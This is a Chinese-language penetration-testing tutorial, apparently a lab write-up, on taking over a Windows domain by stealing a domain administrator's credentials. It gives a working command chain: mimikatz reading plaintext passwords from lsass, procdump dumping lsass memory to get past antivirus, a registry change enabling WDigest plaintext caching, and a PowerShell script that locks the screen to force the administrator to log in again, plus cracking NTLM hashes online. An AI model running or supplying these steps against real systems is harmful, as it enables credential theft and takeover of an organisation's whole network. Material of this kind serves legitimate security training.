搭建虚拟环境

【域控】，192.168.10.3
【域成员】，192.168.10.4

工具

mimikatz
procdump64

在域渗透中、作为渗透测试人员，获取域控的权限基本上可以获取整个内网的权限。在大多数情况下，攻击者可以通过定位域管理员所登录的服务器，利用漏洞获取服务器system权限，找到域管理的账号、进程或是身份验证令牌，从而获取域管理员权限。本文分享几种常见的获取域管理员权限的方式。

方法 一 ：通过高权限读取本地密码

当域管理员在域成员机器上登录进行工作的时候，会将明文密码保存在本地进行的lsass.exe，可以通过mimikatz来读取到本地的明文密码。

如果说，没有出现密码，那么大概率就是版本问题了。

实战中，会有很多可能出现，比如捕获不到明文密码，可以尝试从NTLM入手。

可以通过md5网站进行解密成明文。

如果主机存在杀软的时候，上传mimikatz很多时候都会被杀掉，可以通过procdump+mimikatz的方式进行绕过。
先导出lsass.exe，保存到本地，通过mimikatz读lsass.dmp的明文

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

如果目标机器是windows server 2012，通过添加注册表，在通过锁屏，让管理员重新登录及可以读取明文。

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" >1.txt

添加注册表，设置UseLogonCredential设置为1

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

利用powershell脚本进行锁屏

Function Lock-WorkStation
{
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
$LockWorkStation = Add-Type -memberDefinition $signature -name
"Win32LockWorkStation" -namespace Win32Functions -passthru
$LockWorkStation::LockWorkStation() | Out-Null
}
Lock-WorkStation

管理员重新登录后就可以抓取到明文密码了。

删除连接过程。